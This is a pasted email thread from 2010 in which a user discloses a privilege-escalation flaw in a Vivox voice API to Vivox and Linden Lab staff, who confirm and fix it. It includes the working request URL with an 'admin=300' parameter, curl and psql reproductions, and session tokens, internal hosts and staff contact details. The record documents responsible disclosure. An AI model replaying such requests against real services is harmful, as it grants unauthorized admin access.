Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- Inbox
- X
- Reply
- from Zidonuke <[email protected]>
- date Fri, Jul 2, 2010 at 9:56 PM
- subject SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by gmail.com
- hide details Jul 2
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
- This has been sent to vivox staff which I took from the admin interface
- since this is a vivox side exploit.
- By adding a "admin" parameter to the request while logged in with "ANY"
- (Normal User, Admin, Whatever) will change the admin flag of that user
- without any checks.
- Example: Will grant me Operations Admin rights
- http://www.bhr.vivox.com/api2/viv_acct.php?mode=update&admin=300
- Response:
- <response xmlns="http://www.vivox.com"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation= "/xsd/user_info.xsd">
- <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</cookie><auth_token>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</auth_token><body><level2><email></email><admin>300</admin><accountid>8024251</accountid><username>xHPoFq2qhT1eklXlxyWzE6w==</username><sip_realm>bhr.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><firstname>Melfina</firstname><lastname>Sapphire</lastname><displayname>Melfina%20Sapphire</displayname><gender></gender><age>60</age><timezone>5</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2010-04-11
- 18:52:13.057839-04</created><modified>2010-07-02
- 21:52:41.797926-04</modified><accessed>2010-07-02
- 21:11:02.559563-04</accessed><trialend>2030-01-01
- 00:00:00-05</trialend><ctype>0107121206</ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
- </response>
- Goodluck to you all to you all on fixing this.
- Please note, No servers or accounts or anything has been harmed in the
- exploitation of this.
- If you would like more info or need me for anything please feel free to
- email me back.
- -----BEGIN PGP SIGNATURE-----
- Version: GnuPG v1.4.10 (MingW32)
- Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
- iQEcBAEBAgAGBQJMLpi2AAoJEG12Dp/mJePAGYAH/ivRrLi45l35sWfV9z9ns73U
- w069XNDOPGwmoUuZz3BmEy+ZGRv/DhiY40ZRc/4bOz8fcVKkaYu/k8CnBayQF8BN
- 5RgBZF0rboqkZ1DwwxQHE5NJrl8ldsQ8BT1IOH1HqEWFSizeW3m0sL8jbT8ud/cQ
- Esryx9Jt3r5ajFTZyyC2e8pVEDiEiwQuzBSNUjxkcHynpVW1yywXdhLq9C+ixWp9
- o30w9SkAI+LE1/XG6QJKc7vBaHnOuaxuTiKgX2/bezLmySmKNFah6c5gYmzgHP10
- wbRz09b7QhfaJ7ip7CzJjkiRiv2yGew3b8qrx+YyJsurHxW5Z5NR3ITzHCYHScM=
- =0Gyc
- -----END PGP SIGNATURE-----
- Reply
- Reply to all
- Forward
- Reply
- from Mail Delivery System <[email protected]>
- date Fri, Jul 2, 2010 at 9:56 PM
- subject Undelivered Mail Returned to Sender
- mailed-by ast4a.vivox.com
- hide details Jul 2
- This is the mail system at host lib4.vivox.com.
- I'm sorry to have to inform you that your message could not
- be delivered to one or more recipients. It's attached below.
- For further assistance, please send mail to <postmaster>
- If you do so, please include this problem report. You can
- delete your own text from the attached returned message.
- The mail system
- <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
- <[email protected]>: Recipient address rejected: vivox.com (in reply to RCPT
- TO command)
- <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
- <[email protected]>: Recipient address rejected: vivox.com (in reply to RCPT
- TO command)
- <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
- <[email protected]>: Recipient address rejected: vivox.com (in reply to
- RCPT TO command)
- <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
- <[email protected]>: Recipient address rejected: vivox.com (in reply to RCPT
- TO command)
- Final-Recipient: rfc822; [email protected]
- Original-Recipient: rfc822;[email protected]
- Action: failed
- Status: 5.1.1
- Remote-MTA: dns; mail5a.vivox.com
- Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address rejected:
- vivox.com
- Final-Recipient: rfc822; [email protected]
- Original-Recipient: rfc822;[email protected]
- Action: failed
- Status: 5.1.1
- Remote-MTA: dns; mail5a.vivox.com
- Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address
- rejected: vivox.com
- Final-Recipient: rfc822; [email protected]
- Original-Recipient: rfc822;[email protected]
- Action: failed
- Status: 5.1.1
- Remote-MTA: dns; mail5a.vivox.com
- Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address
- rejected: vivox.com
- Final-Recipient: rfc822; [email protected]
- Original-Recipient: rfc822;[email protected]
- Action: failed
- Status: 5.1.1
- Remote-MTA: dns; mail5a.vivox.com
- Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address rejected:
- vivox.com
- ---------- Forwarded message ----------
- From: Zidonuke <[email protected]>
- To: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected]
- Date: Fri, 02 Jul 2010 21:56:06 -0400
- Subject: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
- This has been sent to vivox staff which I took from the admin interface
- since this is a vivox side exploit.
- By adding a "admin" parameter to the request while logged in with "ANY"
- (Normal User, Admin, Whatever) will change the admin flag of that user
- without any checks.
- Example: Will grant me Operations Admin rights
- http://www.bhr.vivox.com/api2/viv_acct.php?mode=update&admin=300
- Response:
- <response xmlns="http://www.vivox.com"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation= "/xsd/user_info.xsd">
- <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</cookie><auth_token>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</auth_token><body><level2><email></email><admin>300</admin><accountid>8024251</accountid><username>xHPoFq2qhT1eklXlxyWzE6w==</username><sip_realm>bhr.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><firstname>Melfina</firstname><lastname>Sapphire</lastname><displayname>Melfina%20Sapphire</displayname><gender></gender><age>60</age><timezone>5</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2010-04-11
- 18:52:13.057839-04</created><modified>2010-07-02
- 21:52:41.797926-04</modified><accessed>2010-07-02
- 21:11:02.559563-04</accessed><trialend>2030-01-01
- 00:00:00-05</trialend><ctype>0107121206</ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
- </response>
- Goodluck to you all to you all on fixing this.
- Please note, No servers or accounts or anything has been harmed in the
- exploitation of this.
- If you would like more info or need me for anything please feel free to
- email me back.
- -----BEGIN PGP SIGNATURE-----
- Version: GnuPG v1.4.10 (MingW32)
- Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
- iQEcBAEBAgAGBQJMLpi2AAoJEG12Dp/mJePAGYAH/ivRrLi45l35sWfV9z9ns73U
- w069XNDOPGwmoUuZz3BmEy+ZGRv/DhiY40ZRc/4bOz8fcVKkaYu/k8CnBayQF8BN
- 5RgBZF0rboqkZ1DwwxQHE5NJrl8ldsQ8BT1IOH1HqEWFSizeW3m0sL8jbT8ud/cQ
- Esryx9Jt3r5ajFTZyyC2e8pVEDiEiwQuzBSNUjxkcHynpVW1yywXdhLq9C+ixWp9
- o30w9SkAI+LE1/XG6QJKc7vBaHnOuaxuTiKgX2/bezLmySmKNFah6c5gYmzgHP10
- wbRz09b7QhfaJ7ip7CzJjkiRiv2yGew3b8qrx+YyJsurHxW5Z5NR3ITzHCYHScM=
- =0Gyc
- -----END PGP SIGNATURE-----
- Reply
- Forward
- Reply
- from Mail Delivery Subsystem <[email protected]>
- date Fri, Jul 2, 2010 at 9:56 PM
- subject Delivery Status Notification (Failure)
- hide details Jul 2
- Delivery to the following recipient failed permanently:
- Technical details of permanent failure:
- Google tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 550 550 5.2.1 The email account that you tried to reach is disabled. e12si2574720wam.142 (state 17).
- ----- Original message -----
- Received: by 10.229.218.16 with SMTP id ho16mr1083453qcb.13.1278122167979;
- Fri, 02 Jul 2010 18:56:07 -0700 (PDT)
- Return-Path: <[email protected]>
- Received: from [192.168.0.198] ([216.40.74.14])
- by mx.google.com with ESMTPS id m24sm5354550qck.29.2010.07.02.18.56.06
- (version=SSLv3 cipher=RC4-MD5);
- Fri, 02 Jul 2010 18:56:07 -0700 (PDT)
- Message-ID: <[email protected]>
- Date: Fri, 02 Jul 2010 21:56:06 -0400
- From: Zidonuke <[email protected]>
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100608 Thunderbird/3.1
- MIME-Version: 1.0
- Subject: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- X-Enigmail-Version: 1.1.1
- Content-Type: text/plain; charset=ISO-8859-1
- Content-Transfer-Encoding: 7bit
- - Show quoted text -
- Reply
- Forward
- Reply
- from Ken Cox <[email protected]>
- to Zidonuke <[email protected]>
- date Fri, Jul 2, 2010 at 10:18 PM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by vivox.com
- hide details Jul 2
- It's true.
- [kenstir@lab0c ~]$ psql -h dbp.mpsl.vivox.com -U apache prov_mpsl -c "select acc_id,acc_admin,acc_name,acc_password from accounts where acc_name='tester1'"
- acc_id | acc_admin | acc_name | acc_password
- --------+-----------+----------+--------------
- 29 | 0 | tester1 | foobar
- (1 row)
- [kenstir@lab0c ~]$ curl -i 'http://www.mpsl.vivox.com/api2/viv_acct.php?mode=update&admin=300&auth_token=tester1:1328123230:f98f6ebb1e1158ce5d0f7c3c44435ade:10.1.1.232'
- HTTP/1.1 200 OK
- Date: Sat, 03 Jul 2010 02:18:22 GMT
- Server: Apache/2.2.3 (CentOS)
- X-Powered-By: PHP/5.1.6
- Cache-Control: no-store, no-cache, must-revalidate
- Set-Cookie: vx_session=tester1%3A1328123502%3Af06ca5f225f1351709447533277b4b60%3A10.1.1.232; path=/
- Expires: Mon, 26 Jul 1997 05:00:00 GMT
- Last-Modified: Sat, 03 Jul 2010 02:18:22 GMT
- Cache-Control: post-check=0, pre-check=0
- Pragma: no-cache
- Content-Length: 1252
- Connection: close
- Content-Type: text/xml; charset=utf-8
- <?xml version="1.0" encoding="UTF-8" ?>
- <response xmlns="http://www.vivox.com"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation= "/xsd/user_info.xsd">
- <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</cookie><auth_token>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</auth_token><body><level2><admin>300</admin><accountid>29</accountid><username>tester1</username><sip_realm>mpsl.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><email>[email protected]</email><firstname>tester1</firstname><lastname>morpheus</lastname><displayname>Mr</displayname><gender>male</gender><age>33</age><timezone>1</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2007-12-05 09:50:01.021208-05</created><modified>2010-07-02 22:18:22.02362-04</modified><accessed>2010-07-02 22:13:17.526063-04</accessed><trialend>2030-01-01 00:00:00-05</trialend><ctype></ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
- </response>
- [kenstir@lab0c ~]$ psql -h dbp.mpsl.vivox.com -U apache prov_mpsl -c "select acc_id,acc_admin,acc_name,acc_password from accounts where acc_name='tester1'"
- acc_id | acc_admin | acc_name | acc_password
- --------+-----------+----------+--------------
- 29 | 300 | tester1 | foobar
- (1 row)
- Reply
- Forward
- Reply
- from Ken Cox <[email protected]>
- to Zidonuke <[email protected]>
- date Fri, Jul 2, 2010 at 10:20 PM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by vivox.com
- hide details Jul 2
- Zidonuke,
- Thank you for bringing this to our attention.
- -kenstir
- Reply
- Forward
- Reply
- from Zidonuke <[email protected]>
- to Ken Cox <[email protected]>
- date Fri, Jul 2, 2010 at 10:22 PM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by gmail.com
- hide details Jul 2
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
- - Show quoted text -
- Your very welcome. I was working on some second life related things that
- work with the api2 urls. I was running a font_default update and noticed
- the field <admin>. So I was like... Ok... lets add &admin=300 to the url.
- Anyways, Goodluck to you all on fixing it.
- -----BEGIN PGP SIGNATURE-----
- Version: GnuPG v1.4.10 (MingW32)
- Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
- iQEcBAEBAgAGBQJMLp8BAAoJEG12Dp/mJePAZC8H/iEzm68U5zbpNXkS/QamxqnU
- algzq8EbEiMx/jJi5DMZWDz4lq4+K/PLmv4PerDGHPiG5fqWgJTcA66ksnbR59FA
- BMWhXjsjFf8Uw/l3VfR41bix19fp8AX8Tt7ldCaJ4+SlqVjaYzvKFF2qdhPghm/1
- oXqbQgyAvv7CSd9AQGlpz6PtjaJl/sTY3ObPS5hW3WdrQxsNKN7ILQwOZ2iuEiTu
- +IBOCTTL7yI0at3RgwenakOWazNc0cbt7eXWBvTMXIjk8JWvWWN8tuCNwgMvEvl4
- BYiTnU2oeUSLjvpkEv0dQ0oOiiQhaYkJEikGfdaohAJOT7isU459vwMxDLCtw6E=
- =RWbs
- -----END PGP SIGNATURE-----
- Reply
- Forward
- Reply
- from Zidonuke <[email protected]>
- to Ken Cox <[email protected]>
- date Fri, Jul 2, 2010 at 10:47 PM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by gmail.com
- hide details Jul 2
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
- On 7/2/2010 10:20 PM, Ken Cox wrote:
- - Show quoted text -
- Ohhh btw. You guys couldn't let me keep the Operations Admin Role for
- that account? haha.
- -----BEGIN PGP SIGNATURE-----
- Version: GnuPG v1.4.10 (MingW32)
- Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
- iQEcBAEBAgAGBQJMLqTKAAoJEG12Dp/mJePA7NwH/A0J3DuAnIiFBsIdTetSIW7D
- gp8JSNUc2YleyxgsC0yPN+3VWZ9dhp2F+QM0OV+FdNsxNLuFMRmq9FoNpLSwOFNl
- YqJP12ePS0W0rynijw8LPmPFwnSTc21jJws/L/gCaO/Ec/wPp0zwozZXULQNw80Z
- dM30KhjBi7BXAKy4qAwafDhiLpaKdXR5r+pu1hn6pR/eKt9wsUsx41o21lRIxoXO
- 6F21XvN2idNcm5JBKu2Uw7Q3nrq1sc+OXV6NbcZcOuYvhMd3t21lEOinv8i+9aJn
- vTQhvwV42c1HcSJssnCkHZIjBuvf77DGoh2/BfohFABYgR8HxtEeGN39Y6Kg/DU=
- =IE6F
- -----END PGP SIGNATURE-----
- Reply
- Forward
- Reply
- from Brian McGroarty <[email protected]>
- date Fri, Jul 2, 2010 at 10:47 PM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- hide details Jul 2
- Thank you for this report, and for pushing it to a wide audience at
- Vivox and Linden Lab. I'm leaning on Vivox to try and get this
- addressed despite the holiday weekend. In the mean time, I would
- appreciate it if you wouldn't discuss this with anyone else. I don't
- know how responsive their engineers will be.
- Have you seen any third-party discussions to date?
- > From: Zidonuke <[email protected]>
- > Date: Fri, Jul 2, 2010 at 6:56 PM
- > Subject: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- >
- >
- - Show quoted text -
- > --
- > Joe Miller
- > VP, Platform & Technology Development
- > Linden Research, Inc.
- > 945 Battery St.
- > SF, CA 94111
- >
- > 925 452-7578 direct
- >
- --
- Brian McGroarty | Linden Lab
- Sent from my Newton MP2100 via acoustic coupler
- Reply
- Forward
- Reply
- from Zidonuke <[email protected]>
- to Brian McGroarty <[email protected]>
- date Fri, Jul 2, 2010 at 10:51 PM
- subject Fwd: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by gmail.com
- hide details Jul 2
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
- Vivox has already contacted me and gave me info.
- Also the account I escalated to Operations Admin was already removed.
- It appears it will be fixed as soon as possible.
- Also no one else knows about this exploit. So far I'm the only one who
- knows about it.
- On a final note. Can I Haz A Cookie Soft? :3
- Zidonuke (Melfina Marshdevil)
- - -------- Original Message --------
- Subject: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- Date: Fri, 2 Jul 2010 22:20:18 -0400 (EDT)
- From: Ken Cox <[email protected]>
- To: Zidonuke <[email protected]>
- Zidonuke,
- Thank you for bringing this to our attention.
- - -kenstir
- - -------- Original Message --------
- Subject: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- Date: Fri, 2 Jul 2010 22:18:50 -0400 (EDT)
- From: Ken Cox <[email protected]>
- To: Zidonuke <[email protected]>
- - Show quoted text -
- <response xmlns="http://www.vivox.com"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation= "/xsd/user_info.xsd">
- <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</cookie><auth_token>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</auth_token><body><level2><admin>300</admin><accountid>29</accountid><username>tester1</username><sip_realm>mpsl.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><email>[email protected]</email><firstname>tester1</firstname><lastname>morpheus</lastname><displayname>Mr</displayname><gender>male</gender><age>33</age><timezone>1</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2007-12-05
- 09:50:01.021208-05</created><modified>2010-07-02
- 22:18:22.02362-04</modified><accessed>2010-07-02
- 22:13:17.526063-04</accessed><trialend>2030-01-01
- 00:00:00-05</trialend><ctype></ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
- </response>
- [kenstir@lab0c ~]$ psql -h dbp.mpsl.vivox.com -U apache prov_mpsl -c
- "select acc_id,acc_admin,acc_name,acc_password from accounts where
- acc_name='tester1'"
- acc_id | acc_admin | acc_name | acc_password
- - --------+-----------+----------+--------------
- 29 | 300 | tester1 | foobar
- (1 row)
- -----BEGIN PGP SIGNATURE-----
- Version: GnuPG v1.4.10 (MingW32)
- Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
- iQEcBAEBAgAGBQJMLqXDAAoJEG12Dp/mJePAxewIAKHbDNH33PYN6vxB7262cjtG
- cFC9Cd4NyOKruBe3wPgNytZoQyxpUMvfogPyx/OOzFdc4sBeVm1Pa2VthhDBFYQo
- 4qUq3GBCTk2QE6VxrJ5soBXmVcT3ReTHHeiNcmZUcq8e3hmHAhtsOoiHLsEWgvq6
- HAAz2PZz8mUzxTCABIw5TOya53SJBOpZ9hLWC/k8mSpOhLHmMfNsfjydCdgt3HSM
- 6w7T6Y35mbZ9laz4MQk26RJDCdpYbiAFsJFbz+7vc4zVUd/47VNc3wdCj3rahR5J
- 4irVgHuVnzQInTBZt/xvpioeFCThFNanKDRzenHoM94Zkf8vrxXA/IRbfOtKeVo=
- =qF/K
- -----END PGP SIGNATURE-----
- Reply
- Forward
- Reply
- from Ken Cox <[email protected]>
- to Zidonuke <[email protected]>
- date Fri, Jul 2, 2010 at 10:55 PM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by vivox.com
- hide details Jul 2
- Sorry, though I did let you keep voice! I really do appreciate your wearing the white hat on this issue and letting us know without further exploit. So the deactivates/activates I saw yesterday were just you playing around? Good.
- kenstir
- Reply
- Forward
- Reply
- from Zidonuke <[email protected]>
- to Ken Cox <[email protected]>
- date Fri, Jul 2, 2010 at 11:01 PM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by gmail.com
- hide details Jul 2
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
- I assure you that no harm was done to any accounts. If there is any
- damage then you all can do your worst. It was very interested to learn
- how your guy's backend systems worked.
- Most of the stuff I did was viewing, and I'll have to admit I did test
- ban myself and turned this one channel into a conference but as I said I
- did reversed anything I did.
- As of right now I don't see any other exploits but I have a feeling that
- there may be more.
- Anything from my IP range was me:
- NetRange: 216.40.64.0 - 216.40.95.255
- CIDR: 216.40.64.0/19
- Also the accounts
- lolhax
- lolhax# <-- Whatever number
- TestAdmin2
- xN788byUiSE252PJ0E5ZgiQ==
- xHPoFq2qhT1eklXlxyWzE6w==
- On 7/2/2010 10:55 PM, Ken Cox wrote:
- > Sorry, though I did let you keep voice! I really do appreciate your wearing the white hat on this issue and letting us know without further exploit. So the deactivates/activates I saw yesterday were just you playing around? Good.
- >
- > kenstir
- -----BEGIN PGP SIGNATURE-----
- Version: GnuPG v1.4.10 (MingW32)
- Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
- iQEcBAEBAgAGBQJMLqgjAAoJEG12Dp/mJePAqNMH/iKP3Odp3fpo2jGHEsFoCjcH
- W0Hz/qntgc1VgWw1mKfgwDKFqzIl3QEcOkW8uJ/OeiVs0g8rW6h6HEQG4BcLnlSA
- q6RUShqOBhQSlPZBL0jmlXg1AHb/qSay146R3Dw7yAC1o+IhwALS/Zbs4UpSnUEW
- jq0edShSmVCuBzA6w1SmWrBZJldOormhsssSMWDAneEaJIWCTDGzD7qUKmuOAokz
- d2fBb+9ylC6Qix0YNlHbJMEwcCFsfL+bZFNhEuhYtWt4Ilhml7bcvupuXbOO6z6s
- 4BkwRO9V02Ff4FJtBDOHywh/a52k6TuqSWYkqdE//Aj25l6R0V7Jp33iWguZkvE=
- =DPnB
- -----END PGP SIGNATURE-----
- Reply
- Forward
- Reply
- from Brian McGroarty <[email protected]>
- to Zidonuke <[email protected]>
- date Fri, Jul 2, 2010 at 11:04 PM
- subject Re: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- hide details Jul 2
- Ha! You are welcome to all my cookies, outside the browser context.
- Again, thank you. I'm glad someone with good intent found this.
- And at this point I'm tempted to fly out to Vivox and do physical
- harm. What a mess.
- - Show quoted text -
- - Show quoted text -
- Reply
- Forward
- Reply
- from Zidonuke <[email protected]>
- to Brian McGroarty <[email protected]>
- date Fri, Jul 2, 2010 at 11:09 PM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by gmail.com
- hide details Jul 2
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
- On a side note. This effects all of there services.
- I'm a EVE Online player and was able to escalate my player account to
- Ops Admin on the EVE Vivox.
- So LL shouldn't feel bad.
- We should talk later tho. I've seen you around numerous times and never
- got a chance to say Hi more directly. See you around in SL one day.
- Zidonuke (Melfina Marshdevil)
- On 7/2/2010 11:04 PM, Brian McGroarty wrote:
- > Ha! You are welcome to all my cookies, outside the browser context.
- >
- > Again, thank you. I'm glad someone with good intent found this.
- >
- > And at this point I'm tempted to fly out to Vivox and do physical
- > harm. What a mess.
- >
- > On Fri, Jul 2, 2010 at 7:51 PM, Zidonuke <[email protected]> wrote:
- - Show quoted text -
- iQEcBAEBAgAGBQJMLqnyAAoJEG12Dp/mJePAM4AH/jsttDpZbovG3BxS75ld5izs
- tyanv4nxgy1g2ej5evQrhdSiioQXI77WwT94eA5/8zn6QWumE5467mMVnbrOnaxZ
- q6YuTSqEeXEZLCRq9OJbi2soLWvretLTE9CwxVXG/3UuTlXKAg6X0fnCqBatEM3p
- cGddiUpUT84O6XkDEdECGWyDNgzdyYf+lybADRAhuBTWsWsK00uVYihYQt7G239U
- ISErL6iElwhLimhlnNxm7s7/BnVGkUKoUj5ZslVXyD74dTEZeteb8APvAxiYf5lc
- gME3mneNLJjOEQd667/vDuBp9d2j5hMsIBU+VpigKkDjYK2ya8IiVOMqSKKPzIo=
- =Biiu
- -----END PGP SIGNATURE-----
- Reply
- Forward
- Reply
- from Ken Cox <[email protected]>
- to Zidonuke <[email protected]>
- date Fri, Jul 2, 2010 at 11:39 PM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by vivox.com
- hide details Jul 2
- Thanks, I do appreciate that you've gone out of your way to be helpful. Please let me and [email protected] know of any other issues you find. I believe the privilege escalation issue is now fixed.
- kenstir
- Reply
- Forward
- Reply
- from Zidonuke <[email protected]>
- to Brian McGroarty <[email protected]>
- date Fri, Jul 2, 2010 at 11:40 PM
- subject Fwd: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by gmail.com
- hide details Jul 2
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
- There you go.
- They work fast.
- - -------- Original Message --------
- Subject: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- Date: Fri, 2 Jul 2010 23:39:49 -0400 (EDT)
- From: Ken Cox <[email protected]>
- To: Zidonuke <[email protected]>
- - Show quoted text -
- -----BEGIN PGP SIGNATURE-----
- Version: GnuPG v1.4.10 (MingW32)
- Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
- iQEcBAEBAgAGBQJMLrE0AAoJEG12Dp/mJePAUSIH+wShnFkBaMDACkk4eGXUtckV
- A/IX06Tl0FaaYD7XSAyUpSa6Z+zTTnhKQVlJG0NxZuqU9Vsi5z7pLSszuEg9u9vp
- Z5/k7Ux8uDJekTNaz0WgG7twk7Ns2CfyJi/UcgK2ssunHfuq9e/179dDm8JlzUsQ
- BvojbRMmZIpd2zsfzzktOuqcCnDYsqJyMaL7RKWvNeU8n4xVVVgU/ddTWOo9Hbhg
- eu92G69iGtWX3bS4j7Hl8TPMZn6I0dIelejZKsBE9IpI7v6u9BBjQWmhPaIFu3i3
- 6bCJs3i5x35j76Tr3LuuufqaNSlM2LbHuFW6kvFDVt2Hkn8kzKAcmXsRS+kTP80=
- =JZmz
- -----END PGP SIGNATURE-----
- Reply
- Forward
- Reply
- from Jenny Jones <[email protected]>
- to Zidonuke <[email protected]>
- date Tue, Jul 6, 2010 at 11:06 AM
- subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
- mailed-by vivox.com
- hide details Jul 6
- Thank you!
- Excellent find by you. *Deeply* appreciate the use of the white hat for this hack, Z.
- One of our engineering staff should be contacting you.
- Again, thank you!
- -----------
- Jenny Jones
- Software QA Manager
- Vivox, Inc.
- 508-650-3571 x2424
- ------------------------------------------------------------------
- The contents of this e-mail message and any attachments are Vivox proprietary, confidential, intended solely for the addressee and shared under terms of non disclosure as may exist between Vivox and recipient(s). The information may also be Vivox legally privileged. This transmission is sent for the sole purpose of delivery to the intended recipient. If you have received this transmission in error, any use, reproduction or dissemination of this transmission is strictly prohibited. If you are not the intended recipient, please immediately notify the sender by reply e-mail or phone and delete this message and its attachments, if any.
- ------------------------------------------------------------------
- ----- Original Message -----
- From: "Zidonuke" <[email protected]>
- - Show quoted text -
- Reply
- Forward
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement